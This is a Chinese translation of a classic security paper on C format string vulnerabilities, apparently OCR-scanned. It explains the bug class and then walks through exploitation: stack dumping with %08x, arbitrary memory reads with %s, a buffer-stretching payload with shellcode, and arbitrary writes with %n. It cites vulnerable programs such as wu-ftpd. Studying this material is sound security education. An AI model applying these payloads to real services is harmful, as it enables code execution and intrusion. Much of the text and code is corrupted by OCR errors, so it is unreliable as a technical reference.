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一 、 引 言 


这 篇 文章 解释 了 茶 种 现象 的 本 质 ， 它 已 经 在 2000 年 的 下 半年 震惊 了 整个 安全 社 群 。 它 就 
是 “格式 化 字符 串 漏 洞 ”， 是 一 种 被 发 现 的 新 型 漏洞 ， 并 且 会 导致 一 系列 的 可 利用 bug， 它 们 在 
各 种 程序 中 都 有 发 现 ， 从 小 型 工具 到 大 型 服务 器 应 用 。 


这 篇 文章 党 试 解 释 该 漏洞 的 结构 ， 并 随后 使 用 这 个 只 是 去 构建 复杂 的 利用 ， 它 会 向 你 展示 如 
何在 C 代码 中 发 现 格 式 化 字符 串 漏洞 ， 以 及 为 什么 这 种 新 型 漏洞 比 通常 的 缓冲 区 溢出 漏洞 更 
加 危险 。 


这 篇 文章 基于 我 在 德国 柏林 进行 的 一 个 德语 演讲 “17th Chaos ee Congress” ° i 
讲 之 后 ， 我 收 到 了 无 数 翻译 它 的 请 求 ， 并 收 到 了 很 多 正面 反馈 。 所 有 这 些 激励 了 我 来 复查 这 
篇 文档 ， 更 新 和 纠正 细节 ， 以 及 制作 一 个 更 加 舅 用 的 LaTeX 版 本 。 


这 篇 文章 涵盖 了 其 它 文章 涉及 的 大 多 数 东 西 ， 以 及 涉及 到 利用 时 的 一 些 更 多 的 技巧 。 在 本 文 
完成 之 时 ， 它 是 最 新 的 ， 并 且 欢 迎 反 馈 。 所 以 在 你 读 完 之 后 ， 请 向 scut@team-teso.net 发 送 
反馈 ， 建 议和 任何 不 是 抱怨 的 东西 。 


这 篇 文章 的 第 一 个 部 分 是 格式 化 字符 串 漏 洞 的 历史 和 认识 ， 后 面 是 如 何在 源码 中 发 现 和 避免 
该 漏洞 的 细节 。 之 后 ， 一 些 基 本 技巧 为 玩 转 该 漏洞 而 开发 ， 从 中 诞生 了 一 些 强 有 力 的 利用 方 
式 ， 这 个 方式 之 后 被 修改 、 改 进 和 实际 应 用 到 特殊 的 场景 中 ， 人 允许 你 利用 至 今 几 乎 所 有 类 型 
的 格式 化 字符 串 漏 洞 。 


对 于 每 个 漏洞 来 说 ， 它 们 都 有 一 段 时 间 了 ， 而 且 新 的 技术 的 出 现 ， 通 常 由 于 旧 技 术 在 特定 场 
景 下 不 工作 了 。 TA Ji >> L EAE A aA o HARKBAT RN 
写作 ， 他 们 是 tf8， 写 了 第 一 个 格式 化 字符 串 利 用 ，portal， 它 在 它 的 文章 中 开发 和 研究 了 
TAA > DIGIT > meN 为 止 大 多 数 高 危 的 远程 格式 化 字符 串 漏洞 ， 以 及 smiler > € 
开发 了 复杂 的 爆破 技巧 。 


虽然 我 在 没有 太 大 帮助 的 情况 下 ， 也 贡献 了 一 些 技巧 ， 一 些 评论 和 技巧 ， 以 理论 或 者 漏洞 利 
用 的 形式 ， 由 它们 展示 给 我 ， 否 则 这 篇 文章 就 不 太 可 能 完成 。 非 常 感谢 ， 我 也 要 感谢 无 数 评 
论 、 复 查 和 改进 写 篇 文章 的 人 。 


更 新 和 修正 后 的 版 本 在 TESO 安全 小 组 的 主页 上 可 以 找到 。 


1.1 缓冲 区 溢出 vs 格式 化 字符 串 漏洞 


于 过 去 几乎 所 有 严重 的 漏洞 都 是 某 种 缓冲 区 溢出 ， 我 们 可 以 将 这 种 严重 并 且 低级 的 漏洞 和 
这 一 新 兴 漏洞 相 比 较 。 


发 布 时 间 
意识 到 危险 
利用 数量 
被 认为 
技巧 

AF ez 


缓冲 区 溢出 
20 世纪 80 年 代 中 期 
20 世纪 90 年 代 
T 
安全 威胁 
进化 并 且 先 进 
有 时 非常 困难 


格式 化 字符 串 
1999 年 6 月 
2000 年 6 月 
几 十 
编程 的 Bug 
基本 的 技巧 
简单 


1.2 统计 : 2000 年 重要 的 格式 化 字符 串 漏洞 


为 了 强调 格式 化 字符 串 漏洞 在 2000 年 的 危险 影响 ， 我 们 在 这 
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Apache + PHP3 

NLS / locale 
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security.is 
security.is 


CORE SDI 


Jouko Pynnonen 


TESO 


ktwo 


里 例 举 了 最 为 可 利用 的 公开 漏 


影响 年 限 
远程 root > 6 
远程 root > 14 
远程 root >8 
远程 用 户 > 3 
远程 用 户 > 2 
本 地 root 名 
本 地 root > 5 
本 地 root ? 
本 地 root is 


在 本 文 完 成 之 时 ， 还 有 很 多 未 知 或 者 未 发 现 的 漏洞 ， 并 且 接 下 来 的 两 到 三 年 ， 格 式 化 字符 串 
漏洞 会 为 已 发 现 的 新 漏洞 的 统计 做 出 贡献 。 我 们 已 经 看 到 ， 它 们 多 于 使 用 更 加 复杂 的 工具 自 
动 化 发 现 ， 并 且 你 可 以 假设 ， 对 于 多 数 现 在 的 漏洞 ， 代 码 虽 然 没 有 公开 ， 但 是 漏洞 已 经 存在 


了 。 


也 有 一 些 在 应 用 中 发 现 这 一 类 


类 型 咯 多 年 过 得 方式 ， 它 们 只 在 二 
种 更 加 通用 的 方式 来 寻找 “参数 缺失 ”， 它 在 Halvar Flakes 的 二 


进 制 中 可 用 。 为 此 ， 使 用 了 一 
进 制 审计 演讲 中 有 所 展示 。 
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格式 化 函数 是 一 类 特殊 的 ANSI C 函数 ， 接 受 可 变数 量 的 参数 ， 其 中 的 一 个 就 是 所 谓 的 格式 化 
字符 串 。 当 函数 求解 格式 化 字符 串 时 ， 它 会 访问 向 函数 提供 的 额外 参数 。 它 是 一 个 转换 函 
数 ， 用 于 将 原始 的 C 数据 类 型 表示 为 人 类 可 读 的 字符 串 形 式 。 它 们 在 几乎 任何 C 程序 中 都 会 
使 用 ， 来 输出 信息 、 打 印 错误 信息 或 处 理 字 符 串 。 


这 一 章 中 ， 我 们 会 涵盖 格式 化 函数 使 用 中 的 典型 漏洞 ， 正 确 用 法 ， 它 们 的 一 些 参数 ， 以 及 格 
式 化 字符 串 漏洞 的 一 般 概念 。 


` ` -Jo 
2.1 HACE 
如 果 攻 击 者 能 够 向 ANSI C 格式 化 函数 提供 字符 串 ， 无 论 部 分 还 是 全 部 ， 就 出 现 了 格式 化 字符 
串 漏 洞 。 由 此 ， 格 式 化 函数 的 行为 会 改变 ， 并 且 攻 击 者 就 可 能 控制 目标 应 用 。 


在 下 面 的 例子 中 ， 字 符 串 user 由 攻击 者 提供 -- 他 可 以 控制 整个 ASCIIZ 字符 囊 ， 例 如 通过 使 
用 命令 行 参数 。 


FIRE : 


int func (chan suser { 
printf (user); 
} 


正确 用 法 : 


int func (char *user) { 
printf ("%s", user); 


2.2 格式 化 函数 系列 

ANSI C 规范 中 定义 了 大 量 格式 化 函数 。 有 一 些 基本 的 格式 化 函数 ， 复 杂 的 函数 基于 它们 ， 它 
们 中 的 一 些 并 不 是 标准 的 一 部 分 ， 但 是 广泛 可 用 。 

实际 成 员 为 : 


e fprintf -- 打印 到 FILE 流 


e printf -- 打印 到 stdout 流 


© sprintf -- 打印 到 字符 串 


e snprintf -- Ira FAE o AAKRE 

© vfprintf -- 从 va_arg 结构 打印 到 FILE 流 
e vprintf -- 从 va_arg 结构 打印 到 stdout 流 
e vsprintf -- 从 va_arg 结构 打印 到 字符 串 


© vsnprintf -- 从 va_arg 结构 打印 到 字符 串 ， 带 有 长 度 检查 


@ setproctitle -- 设置 argv[] 
e syslog -- 输出 到 syslog 设施 


e 其 它 类 似 err* , verr* , warn* , vwarn* 的 函数 


2.3 格式 化 函数 的 用 法 


为 了 理解 这 个 漏洞 在 C 语言 代码 的 哪里 ， 我 们 必须 检验 格式 化 函数 的 目的 。 
功能 

o 用 于 将 简单 的 C 数据 类 型 转换 为 字符 串 表 示 

。 允许 指定 表示 的 格式 

o 处 理 产生 的 字符 串 (输出 到 stderr > stdout ` syslog ...) 
格式 化 函数 工作 原理 

。 格式 化 字符 串 控 制 了 函数 的 行为 

。 它 指定 了 需要 打印 的 参数 类 型 

o 直接 ( 传 值 ) 或 间接 (at) 保存 二 者 
调用 函数 
需要 知道 它 向 栈 中 压 入 了 多 少 参数 ， 因 为 它 当 格式 化 函数 返回 时 需要 清 栈 。 


2.4 格式 化 字符 串 具体 是 什么 ? 


格式 化 字符 串 是 一 个 ASCIIZ 字符 囊 ， 包 含 文本 和 格式 化 参数 。 


例如 : 


printf ("The magic number is: %d\n", 1911); 


要 打印 的 文本 是 The magic number is: ， 后 面 是 格式 化 参数 %d ° 它 在 输出 中 会 被 参 
数 1911 代替 。 所 以 输出 是 这 个 样子 : he magic number is: 1911 ° 


一 些 格式 化 参数 : 
参数 输出 传递 方式 
%d 十 进 制 ( int ) 传 值 
%u 无 符号 十 进 制 ( unsigned int ) 传 值 
%X 十 六 进 制 ( unsigned int ) 传 值 
%s 字符 串 ( (const) char* ) 传 址 
%n 目前 为 止 写 入 的 字 节 数 ( int * ) 传 址 


\ 字符 用 于 转 义 特殊 字符 。 它 会 被 C 编译 器 在 编译 使 其 替换 ， 将 转 义 序列 替换 为 二 进 制 中 的 
适当 字符 。 格 式 化 函数 并 不 会 识别 这 些 特殊 的 序列 。 实 际 上 ， 它 们 并 不 对 格式 化 字符 串 做 任 
何事 情 ， 但 是 有 时 会 产生 混淆 ， 就 像 它 们 被 编译 器 求 值 一 样 。 

例如 : 


printf ("The magic number is: \x25d\n", 23); 


上 面 的 代码 可 以 工作 ， 因 为 \x25 ARMENIA % > BR 6x25 (37) 是 百 分 号 字符 的 
ASCII 值 。 


2.5 栈 和 它 在 格式 化 字符 串 中 的 作用 


格式 化 函数 的 行为 由 格式 化 字符 串 控 制 。 了 有 函数 接 受 栈 上 的 一 些 参数 ， 它 们 由 格式 化 字符 串 请 
R o 


printf ("Number %d has no address, number %d has: %08x\n", i, a, &a); 


M printf 来 看 ， 栈 的 样子 是 : 


(ip ee al 
| é&a | 
| a | 
| 2 | 
| A | 
[eee een 
(Soe Sa + 
其 中 
符号 含义 
A 格式 化 字符 串 的 地 址 
i 变量 i 的 值 
a 变量 a 的 值 
&a 变量 a 的 地 址 


格式 化 字符 串 现在 解析 了 格式 化 字符 囊 A， 一 次 读 取 一 个 字符 。 如 果 它 不 是 % ， 字 符 会 复制 
到 输出 中 。 和 否则 ，% 后 面 的 字符 规定 了 要 求 值 的 参数 类 型 。 字 符 囊 x% 拥有 特殊 函数 ， 用 于 
打印 转 义 字符 % 本 身 。 其 它 每 个 参数 都 和 数据 相关 ， 位 于 栈 上 。 


HENGE BH i 


格式 化 字符 囊 漏洞 的 通常 分 类 是 “通道 问题 "。 如 果 二 类 不 同 的 信息 通道 混合 为 一 个 ， 并 且 特 殊 
的 转 义 字符 或 序列 用 于 分 辨 当前 哪个 通道 是 激活 的 ， 这 一 类 型 的 漏洞 就 可 能 出 现 。 多 数 情 况 
下 ， 通 道 之 一 是 数据 通道 ， 它 不 会 解析 ， 只 会 复制 ， 而 另 一 个 通道 是 控制 通道 。 


前 常 2 
A 
分 


虽然 对 于 其 本 身 来 说 并 不 是 件 坏事 ， 如 果 攻 击 者 能 够 提供 用 于 某 个 通道 的 输入 ， 它 可 能 很 快 
成 为 严重 的 安全 问题 。 通 常 存 在 错误 的 转 义 ， 或 者 反 转 义 的 途径 ， 或 者 忽视 了 某 个 层面 ， 就 
像 格式 化 字符 串 漏洞 中 那样 。 所 以 我 们 总 结 一 下 : 通道 问题 本 身 没 有 任何 漏洞 ， 但 是 它们 使 
得 bug 可 以 利用 。 


为 了 展示 它 背 后 的 普 ， 这 里 是 一 个 常见 通道 问题 的 列表 : 
场景 数据 通道 控制 通道 安全 问题 
电话 系统 声音 或 数据 控制 音调 线路 控制 
PPP 协议 传输 数据 PPP 命令 流量 放大 
栈 栈 数 据 返回 地 址 返回 地 址 控制 
Malloc 缓冲 区 Malloc 数据 管理 信息 内 存 写 入 
格式 化 字符 串 输出 字符 串 格式 化 参数 格式 化 函数 控制 


回 到 特定 的 格式 化 字符 串 漏洞 ， 有 两 种 典型 的 场景 ， 其 中 产生 了 格式 化 字符 串 漏洞 。 


(Linux rpc.statd 和 IRIX telnetd 中 ) 。 漏 洞 存在 于 syslog 的 第 二 个 参数 中 。 格 式 化 
部 分 是 用 户 提供 。 


一 类 
符 串 ; 


char tmpbuf[512]; 
snprintf (tmpbuf, sizeof (tmpbuf), "foo: %s", user); 


tmpbuf[sizeof (tmpbuf) - 1] = ’\0’; 
syslog (LOG_NOTICE, tmpbuf); 


第 二 类 (wu-ftpd 和 Qualcomm Popper QPOP 2.53 中 ) 。 部 分 由 用 户 提 供 的 字符 串 简 介 传 给 
了 格式 化 函数 。 


aie [Eero (ehar fm ey 


int someotherfunc (char *user) { 


Error (user); 


虽然 第 一 类 漏洞 能 够 由 自动 化 工具 安全 监测 (例如 pscan 或 TESOgcc) ， 只 有 工具 被 告知 函 
数 error 用 作 格 式 化 函数 ， 第 二 类 漏洞 才能 检测 出 来 。 


但 是 ， 你 可 以 自动 化 识别 源码 中 的 额外 格式 化 函数 ， 以 及 它们 的 参数 的 过 程 ， 所 以 总 
之 ， 了 寻找 格式 化 字符 串 的 过 程 可 以 完全 自动 化 。 你 甚至 可 以 归纳 出 ， 如 果 有 这 样 的 工具 
来 完成 这 件 事 ， 并 且 它 没有 在 你 的 源码 中 发 现 格式 化 字 A A 
漏洞 。 这 不 同 于 缓冲 区 溢出 漏洞 ， 其 中 即使 由 资深 审计 者 手动 审计 了 源码 ， 还 是 会 错过 
漏洞 ， 并 且 没 有 可 靠 的 方式 来 自动 化 找 出 它们 。 


3.1 我 们 能 够 控制 什么 


通过 提供 格式 化 字符 串 ， 我 们 就 能 够 控制 格式 化 函数 的 行为 。 我 们 现在 需要 检验 我 们 具体 能 
够 控制 什么 ， 以 及 如 何 使 用 它 来 扩展 这 个 对 进程 的 部 分 控制 ， 来 完全 控制 执行 流 。 


3.2 使 程序 Fe AA it 


pee abe Ge 的 简单 攻击 ， 就 是 使 进程 前 溃 。 这 对 于 某 些 事情 是 实用 的 ， 例 如 使 守 
护 进程 前 溃 ， 它 会 转 储 核 心 ， 并 且 在 核心 转 储 中 有 一 些 有 用 的 数据 。 或 者 在 一 些 网 络 攻击 
ae 


OO 
且 进 程 会 接收 到 SIGSEGv 信号 。 通 常 程序 会 终止 并 转 储 核心 。 


| ， 我 们 可 以 轻易 触发 一 些 无 效 指针 访问 ， 通 过 仅仅 提供 像 这 样 的 格式 


m 


printf ("%s%s%s%s%s%s%s%s%s%s%s%s"); 


由 于 %s 展示 茶 个 地 址 中 的 内 存 ， 这 个 地 址 位 于 栈 上 ， 栈 上 也 储存 了 大 量 其 他 数据 。 我 们 就 有 
很 大 机 会 来 从 非法 地 址 服务 数据 ， 这 个 地 址 并 没有 映射 。 同 时 ， 多 数 何 世 华 函 数 的 实现 提供 
了 x%n 参数 的 功能 ， 他 可 以 用 于 向 栈 上 的 地 址 写 入 。 如 果 它 执行 了 几 次 ， 也 一 定 会 产生 崩溃 。 


3.3 查看 进程 内 存 


eo on pe si a S 
它 是 我 们 所 控制 的 行为 的 输出 。 而 且 我 们 可 以 使 用 这 个 结果 ， 来 获得 我 们 的 客户 端 字 符 
。 ， 以 及 进程 的 布局 是 什么 样 的 概览 。 


这 对 于 很 多 东西 都 很 使 用 ， 例 如 为 真正 的 利用 寻找 正确 的 偏 移 ， 或 者 仅仅 是 重新 构造 目标 进 
FEIR o 


3.3.1 EAR 
我 们 可 以 展示 栈 内 存 的 一 些 部 分 ， 通 过 像 这 样 使 用 格式 化 字符 串 : 


printf ("%08x.%08x .%08x .%08x.%08x\n"); 


这 可 以 工作 ， 因 为 我 们 让 printf 函数 来 从 栈 中 获取 五 个 参数 ， 并 将 其 展示 为 8 位 填充 的 十 六 
进 制 数 值 。 所 以 可 能 的 输出 是 : 


40012980 .080628c4.bffff7a4.00000005.08059c04 


这 是 栈 内 存 的 部 分 转 储 ， 从 当前 的 栈 底 一 直到 栈 顶 -- 假设 栈 向 低地 址 增长 。 取 决 于 格式 化 字 
符 传 缓冲 区 的 大 小 ， 以 及 输出 缓冲 区 的 大 小 ， 使 用 这 种 技巧 ， 你 可 以 或 多 或 少 重 构 栈 内 存 的 
一 部 分 。 在 一 些 情况 下 ， 你 甚至 可 以 获取 整个 栈 内 存 。 


栈 的 转 储 提供 了 关于 程序 流 以 及 函数 局 部 变量 的 重要 信息 ， 并 且 可 能 对 于 寻找 正确 偏 移 以 便 
成 功利 用 有 所 帮助 。 


3.3.2 查看 任何 地 址 的 内 存 


我 们 也 可 以 查看 不 同 于 栈 内 存 的 任意 地 址 。 为 此 ， 我 们 需要 让 格式 化 函数 从 我 们 可 以 提供 的 
某 个 地 址 展示 内 存 。 这 就 有 两 个 问题 : 首先 ， 我 们 需要 找到 一 个 格式 化 字符 串 ， 它 将 某 个 地 
址 ( 传 值 ) 用 作 栈 的 参数 ， 并 且 展 示 其 中 的 内 存 ， 并 且 我 们 需要 提供 这 个 地 址 ， 我 们 在 第 一 
种 情况 中 足够 幸运 ， 由 于 %s 参数 就 是 干 这 个 的 ， 它 展示 内 存 -- 通常 是 ASCIIZ 字符 串 -- 从 
栈 上 提供 的 地 址 。 所 以 剩 下 的 问题 是， 如 何 将 这 个 栈 上 的 地 址 放 到 正确 的 位 置 上 。 


我 们 的 格式 化 字符 串通 常 位 于 栈 上 ， 所 以 我 们 已 经 距离 完全 控制 这 个 区 域 非 常 近 了 ， 格 式 化 
字符 串 就 在 这 里 。 格 式 化 函数 在 内 部 维护 一 个 指针 ， 指 向 当前 格式 化 参数 的 栈 区 域 。 如 果 我 
们 能 够 将 这 个 指针 指向 一 块 可 控 的 内 存 区 域 ， 我 们 就 能 向 %s 参数 提供 一 个 地 址 。 为 了 修改 栈 
指针 ， 我 们 可 以 仅仅 使 用 假 的 参数 ， 它 会 通过 打印 垃圾 来 挖 气 栈 区 。 

这 里 我 们 假设 我 们 能 够 完全 控制 整个 字符 串 。 我 们 稍 后 会 看 到 ， 部 分 控制 ， 字 符 串 过 


渡 ， 空 字 节 包含 的 地 址 ， 以 及 类 似 的 问题 都 会 存在 ， 无 论 何 时 利用 字符 串 格式 化 漏洞 。 


printf ("AAAOAAA1 %08x .%08x .%08x .%08x.%08x"); 


%08x 参数 使 格式 化 函数 内 部 的 栈 指 针 向 栈 顶 方向 增加 。 将 这 个 参数 增加 之 后 ， 栈 指针 就 指 
向 了 我 们 的 内 存 : 格式 化 字符 串 本 身 。 格 式 化 函数 总 是 维护 最 低 的 栈 帧 ， 所 以 如 果 我 们 的 缓 
冲 区 完全 在 栈 上 ， 它 一 定 会 在 当前 栈 指针 的 上 面 。 如 果 我 们 正确 选择 了 wo8x 的 数值 ， 我 们 就 
能 够 展示 任意 地 址 的 内 存 ， 通 过 向 我 们 的 字符 串 附加 %s 。 在 我 们 的 例子 中 ， 地 址 是 非法 的 ， 
它 是 AAAg 。 让 我 们 将 其 换 成 丨 实 的 地 址 。 


例如 : 


address = 0x08480110 
// address (encoded as 32 bit le string): "\x10\x01\x48\x08" 
printf ("\x1O\x01\x48\x08_%08x .%08x .%08x .%08x .%08x|%S |"); 


就 会 转 储 gxg8486116 的 内 存 ， 直 到 到 达 了 空 字符 。 通 过 动态 增加 内 存 地 址 ， 我 们 可 以 查看 整 
个 进程 空间 。 其 至 可 以 创建 远程 进程 的 核心 转 储 ， 就 像 映 像 那 样 ， 以 及 从 中 重新 构建 二 进 
制 。 了 寻找 利用 不 成 功 的 原因 也 是 很 有 用 的 。 


如 果 我 们 不 能 通过 使 用 4 字 节 的 POP 来 达到 精确 的 格式 化 字符 串 的 边界 ， 我 们 需要 填充 格式 
化 字符 囊 ， 通 过 前 置 一 个 、 两 个 或 三 个 垃圾 字符 。 这 就 好 比 绥 冲 区 溢出 利用 中 的 对 齐 。 


我 们 不 能 够 按 位 移动 栈 指针 ， 反 之 我 们 移动 格式 化 字符 串 本 身 ， 以 便 到 达 栈 指针 的 四 字 
节 边 界 ， 并 且 我 们 可 以 使 用 多 个 四 字 节 POP 来 到 达 它 。 


3.4 ENAR A 


漏洞 利用 的 圣杯 就 是 控制 进程 的 指令 指针 。 在 多 数 情况 下 ， 指 令 指 针 (通常 命名 为 I|P， 或 者 
PC) 是 一 个 CPU 中 的 寄存 器 ， 并 不 能 直接 修改 ， 因 为 只 有 机 器 指令 可 以 修改 它 。 但 是 如 果 
我 们 能 够 改动 机 器 指令 ， 我 们 就 已 经 控制 了 它 。 所 以 我 们 不 能 直接 控制 进程 。 通 常 ， 进 程 比 
起 当前 的 攻击 者 拥有 更 多 的 权限 。 

反之 ， 我 们 需要 寻找 修改 指令 指针 的 指令 ， 并 且 影 响 这 些 指令 修改 它 的 方式 。 这 听 起 来 很 复 
杂 ， 但 是 多 数 情况 下 这 非常 简单 ， 因 为 有 些 指令 从 内 存 获取 指令 指针 ， 并 且 跳 到 那里 。 所 以 
在 多 数 情况 下 ， 控 制 了 这 部 分 内 存 ， 其 中 储存 了 指令 指针 ， 就 控制 了 指令 指针 本 身 。 这 就 是 
多 数 缓冲 区 溢出 的 工作 方式 。 

在 两 阶段 的 过 程 中 ， 首 先 要 履 盖 保存 的 指令 指针 ， 之 后 程序 会 指令 一 个 合法 的 指令 ， 它 将 控 
制 流转 移 到 攻击 者 提供 的 地 址 中 。 


我 们 会 检测 一 些 不 同 的 方式 ， 使 用 格式 化 字符 串 漏洞 来 完成 它 。 


3.4.1 利用 - 类 似 于 第 见 的 缓冲 区 溢出 


格式 化 字符 串 漏洞 有 时 提供 了 一 个 在 缓冲 区 长 度 周 围 的 方式 ， 并 且 和 常见 的 缓冲 区 溢出 的 利 
用 方式 相似 。 这 是 出 现在 QPOP 2.53 和 bftpd 中 的 代码 : 

char outbuf[512]; 

char buffer[512]; 


sprintf (buffer, "ERR Wrong command: %400s", user); 
sprintf (outbuf, buffer); 


这 种 例子 通常 深 藏 在 真实 的 代码 中 ， 并 且 不 会 那么 明显 ， 就 像 上 面 的 例子 那样 。 通 过 提供 一 
个 特 珠 的 格式 化 字符 串 ， 我 们 就 能 够 绕 过 %466s 的 限制 : 


"%497d\x3c\xd3\xff\xbf<nops><shellcode>" 


任何 东西 都 和 常见 的 缓冲 区 溢出 类 似 ， 只 是 开头 -- %497d -- 不 同 。 在 常见 的 缕 冲 区 溢出 中 ， 
我 们 覆盖 了 元 数 帧 在 栈 上 的 返回 地 址 。 在 拥有 该 帧 的 函数 返回 值 ， 它 会 返回 到 我 们 提供 的 地 
址 。 地 址 指向 znop> 中 的 某 个 地 方 。 有 一 些 不 错 的 文章 ， 描 述 了 这 一 利用 方式 ， 并 且 如 果 这 
个 例子 对 于 你 来 说 还 不 够 清楚 ， 你 应 该 考虑 首先 阅读 一 篇 入 门 文章 ， 就 像 [5] ABA 


它 创 建 了 长 度 为 497 的 字符 串 i 再 加 上 错误 信息 ( ERR Wrong command: ) ， 它 超出 

了 outbuf 缓冲 区 四 个 字 节 。 虽 然 user 字符 串 只 允许 为 400 字 节 ， 我 们 可 以 通过 不 当 使 用 格 
式 化 字符 串 参 数 来 突破 这 个 长 度 。 由 于 第 二 个 sprintt 不 检查 其 长 度 ， 它 可 以 用 于 突 

破 output 的 边界 。 现 在 我 们 写 入 一 个 返回 地 址 gxbfffd33c ， 并 且 使 用 已 知 的 旧 办 法 来 利用 

它 ， 就 像 我 们 在 任何 缓冲 区 溢出 中 所 做 的 那样 。 虽 然 任 何 允 许 拉 伸 的 格式 化 参数 都 这 样 ， 例 

如 %50d > “sof 或 者 %5gs ， 我 们 还 是 应 该 选择 一 个 不 会 提 领 指令 或 者 可 能 导致 除 零 错 误 的 

参数 。 这 就 排除 了 vsot 和 %5gs 。 我 们 只 剩 下 了 整数 输出 参数 : wu > va 和 %x 。 


GNU C 库 包 含 一 个 Bug， 如 果 你 使 用 mn AF 1000 的 %nd 参数 ， 它 会 导致 崩溃 。 这 是 一 种 判 
断 远 程 GNU C 库 的 方式 。 如 果 你 使 用 %.nd ， 它 正 产 工作 ， 除 非 你 用 了 很 大 的 值 。 有 关 这 个 
长 度 的 深入 讨论 ， 请 见 portal 的 文章 [3] 。 


3.4.2 利用 - 只 通过 格式 化 字符 串 


如 果 我 们 不 能 使 用 刚刚 提 到 的 简单 的 利用 方式 ， 我 们 仍旧 可 以 利用 这 个 过 程 。 由 此 ， 我 们 可 
以 扩展 我 们 极其 有 限 的 控制 -- 控制 格式 化 函数 的 能 力 -- 到 站 实 的 执行 流 控 制 ， 它 会 执行 我 们 
的 原始 机 器 码 。 看 看 这 段 代码 ， 它 在 wu-ftpd 2.6.0 中 发 现 。 


char buffer[512]; 


snprintf (buffer, sizeof (buffer), user); 
buffer[sizeof (buffer) - 1] = ‘\0’; 


在 上 面 的 代码 中 ， 我 们 不 能 通过 插入 某 些 “ 拉 伸 "格式 参数 来 扩大 缓冲 去 ， 因 为 程序 使 用 了 安全 
的 snprintf 函数 来 确保 我 们 不 能 突破 buffer 。 最 开始 它 像 是 ， 我 们 不 能 做 很 多 有 用 的 事 
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让 我 们 回忆 提 到 过 的 格式 化 参数 。 wn 参数 将 已 经 打印 的 字 节 数 ， 写 入 到 我 们 所 选 的 变量 中 。 
通过 将 整数 指针 放置 到 栈 上 作为 参数 ， 变 量 地 址 被 提供 给 格式 化 函数 。 
int i; 


printf ("foobar%n\n", (int *) &i); 
printi Gal KANNE iy 


它 会 打印 i = 6 。 使 用 我 们 在 上 面 使 用 的 相同 方法 来 打印 任何 地 址 的 内 存 ， 我 们 可 以 写 入 任 
意 地 址 : 


" AAAO_%08x .%08x . %O8X .%08x . %O8X . %N" 


使 用 wo8x 参数 ， 我 们 使 格式 化 函数 的 内 部 栈 指针 增加 了 四 个 字 节 。 我 们 这 样 做 ， 知 道 这 个 指 
针 指 向 了 我 们 格式 化 字符 串 的 开头 ( AAA6 ) 。 这 可 以 工作 ， 因 为 我 们 的 格式 化 字符 串通 常 位 
于 栈 上 ， 在 我 们 的 格式 化 函数 栈 帧 的 顶部 。 %n 向 地 址 gx36414141 写 入 ， 它 由 字符 串 AAA6 表 
示 。 通 常 这 会 使 程序 崩溃 ， 由 于 地 址 没有 映射 。 We 

的 地 址 ， 这 可 以 工作 ， 并 且 我 们 在 在 该 地 址 覆盖 了 四 个 字 


"\xcO\xc8\xff\ xbf_%08x .%08x .%08x .%08x .%08x .%n" 


上 面 的 格式 化 字符 串 会 将 gxbfffc8ce 的 四 个 字 节 和 埠 盖 为 一 个 小 型 整数 。 我 们 已 经 完成 了 目标 
之 一 ， 我 们 可 以 写 入 任意 地 址 。 但 是 我 们 不 能 控制 我 们 刚才 缩写 的 坚 直 -- 但 是 这 也 会 改变 
的 。 


我 们 所 写 的 坚 直 -- ee 因为 我 们 控制 了 格 
式 化 字符 串 ， 我 们 至 少 可 以 影响 这 个 数量 ， 通 过 写 入 或 多 或 少 的 字 


int a; 

printf ("%10u%n", 7350, &a); 
/* a == 10 */ 

int a; 


printf ("%150u%n", 7350, &a); 
/* a == 150 */ 
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数量 来 说 -- 例如 地 址 -- 这 还 不 足够 ， 所 以 我 们 需要 找到 一 种 方式 来 写 入 任意 数据 。 


x86 架构 上 的 整数 以 四 个 字 节 储存 ， 小 端 序 ， 最 低 字 节 在 内 存 的 开始 。 所 以 例 
如 gxg966914c 的 数值 在 内 存 中 为 \x4cN\xg1\xgg\xg9g 。 对 于 格式 化 函数 中 的 数量 ， 我 们 可 以 控 
制 最 低 字 节 ， 也 就 是 内 存 中 首先 储存 的 字 节 ， 通 过 使 用 伪造 的 nu 参数 来 修改 它 。 


例如 : 


unsigned char foo[4]; 


printf ("%64u%n", 7350, (int *) foo); 


当 printf HAET fooro] 包含 \x4o ， 它 等 于 64， 我 们 使 用 这 个 数值 来 增加 计数 器 。 
但 是 对 于 一 个 地 址 ， 我 们 需要 完全 控制 四 个 
以 尝试 在 一 行 中 ， 写 入 四 次 ， 一 次 写 入 一 
任意 地 址 。 这 可 以 用 于 写 入 内 存 的 第 二 个 低 


字 节 。 如 果 我 们 不 能 一 次 写 入 四 个 字 节 ， 我 们 可 
字 节 。 在 多 数 CISC 架构 中 ， 能 够 写 入 未 对 齐 的 
字 节 ， 其 中 储存 了 地 址 ， 就 像 : 


Š > 


三 、 格 式 化 字符 串 漏 洞 


unsigned char canary[5]; 
unsigned char foo[4]; 


memset (foo, ‘’\x00’, sizeof (foo)); 
/* © * before */ strcpy (canary, "AAAA"); 


/* 1 */ printf ("%16uU%n", 7350, (int *) &foo[0]); 
/* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]); 
/* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]); 
/* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]); 


/* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); 
printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]); 


返回 了 输出 10204080 和 canary: 00000041 。 我 们 将 我 们 所 指向 的 整数 的 低地 址 字 节 履 盖 四 
次 。 通 过 每 次 增加 指针 ， 低 地 址 字 节 在 我 们 想 要 写 入 的 内 存 中 移动 ， 并 允许 我 们 储存 完全 
意 的 数据 。 


你 可 以 在 图 一 的 第 一 行 看 到 ， 所 有 八 个 字 节 都 没有 被 我 们 的 覆盖 代码 访问 。 从 第 二 行 开始 ， 
我 们 执行 了 四 次 覆盖 ， 每 一 步 都 向 右 提升 一 个 字 节 。 最 后 一 行 展 示 了 最 终 的 预期 状态 : 我 们 
覆盖 了 foo 数组 的 所 有 四 个 字 节 ， 但 是 这 样 做 的 时 候 ， 我 们 破坏 了 canary 的 三 个 字 节 。 我 们 
包含 了 canary 数组 ， 只 是 为 了 看 到 我 们 履 盖 了 不 想 履 盖 的 内 存 。 
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虽然 这 个 方式 看 起 来 复杂 ， 它 也 可 以 用 于 覆盖 任意 地 址 的 任意 数据 。 为 了 解释 ， 我 们 现在 为 
